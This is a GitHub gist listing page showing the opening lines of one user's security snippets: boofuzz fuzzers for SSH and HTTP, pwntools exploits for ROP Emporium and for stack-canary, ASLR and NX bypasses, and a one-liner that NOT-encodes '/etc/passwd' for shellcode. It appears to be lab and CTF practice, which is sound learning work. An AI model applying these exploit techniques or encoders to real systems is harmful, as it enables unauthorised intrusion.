Skip to content

Instantly share code, notes, and snippets.

View Sinkmanu's full-sized avatar
😸

Manuel Mancera Sinkmanu

😸
View GitHub Profile
@Sinkmanu
Sinkmanu / booSSH.py
Last active March 12, 2021 12:07
Fuzzing SSH Key exchange begins
from boofuzz import *
import sys
host = sys.argv[1]
port = int(sys.argv[2])
#def banner(target, fuzz_data_logger, session, *args, **kwargs):
# target.send(b"SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2\x0d\x0a")
# data = target.recv(1024)
# print("RECV: %s" % str(data))
@Sinkmanu
Sinkmanu / booHTTP.py
Created January 18, 2021 14:24
Basic HTTP fuzzer (w boofuzz)
from boofuzz import *
import sys
host = sys.argv[1]
port = int(sys.argv[2])
session = Session(target=Target(SocketConnection(host, int(port))))
s_initialize(name="request")
with s_block("verb"):
@Sinkmanu
Sinkmanu / emporium-write4.py
Created May 15, 2019 12:42
Exploit for write4 challenge of https://ropemporium.com/
#!/usr/bin/env python
from pwn import *
context(arch = 'amd64', os = 'linux')
elf = ELF("./write4")
p = process(elf.path)
#p = gdb.debug("/home/manu/Challenges/write4", '''
#break main
@Sinkmanu
Sinkmanu / scrapy-skeleton.py
Created March 15, 2019 07:00
Python scrapy skeleton
import requests
from bs4 import BeautifulSoup
user_agent = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0' }
r = requests.get("url", verify=False, headers=user_agent)
soup = BeautifulSoup(r.text, "html5lib")
print soup.find_all('a')
@Sinkmanu
Sinkmanu / exploit.py
Created May 29, 2018 08:20
Ret2mprotect - Bypassing canary stack, NX and ASLR.
from pwn import *
'''
// File: bypass-protections.c
// gcc bypass-protections.c -o bypass-protections
#include <stdio.h>
#include <stdlib.h>
@Sinkmanu
Sinkmanu / exploit-pi.py
Last active May 24, 2018 16:33
Ret2libc on raspberry pi exploit
from pwn import *
'''
// Raspberry pi:
// File: leak.c
// gcc leak.c -o leak
// socat -v tcp-listen:4444,reuseaddr,fork exec:"./leak"
#include <stdio.h>
@Sinkmanu
Sinkmanu / exploit.py
Created May 24, 2018 08:11
Easy exploit to bypass canary, ASLR and NX
from pwn import *
'''
// File: leak.c
// gcc leak.c -o leak
#include <stdio.h>
int main(int argc, char *argv[]){
char buff[64];
@Sinkmanu
Sinkmanu / exploit-canary.py
Created May 22, 2018 12:55
Exploit with stack guard bypass
from pwn import *
'''
// File: bypass-canary.c
// $ gcc bypass-canary.c -o bypass-canary
#include <stdio.h>
#include <stdlib.h>
@Sinkmanu
Sinkmanu / srec-checksum.py
Created March 14, 2018 11:26
S-record checksum calculator
#!/usr/bin/env python
# usage: $ ./srec-checksum.py <s-record without checksum>
import sys
cad = sys.argv[1]
i = 2
checksum = 0
while i<len(cad):
@Sinkmanu
Sinkmanu / not-encoder.sh
Created October 12, 2017 11:20
Encode string with NOTs
$ echo -e 'import ctypes\nimport sys\nf="/etc/passwd"\nfor i in f:\n\tsys.stdout.write(hex(ctypes.c_uint8(~ord(i)).value)+",")\nsys.stdout.write("\\n")' | python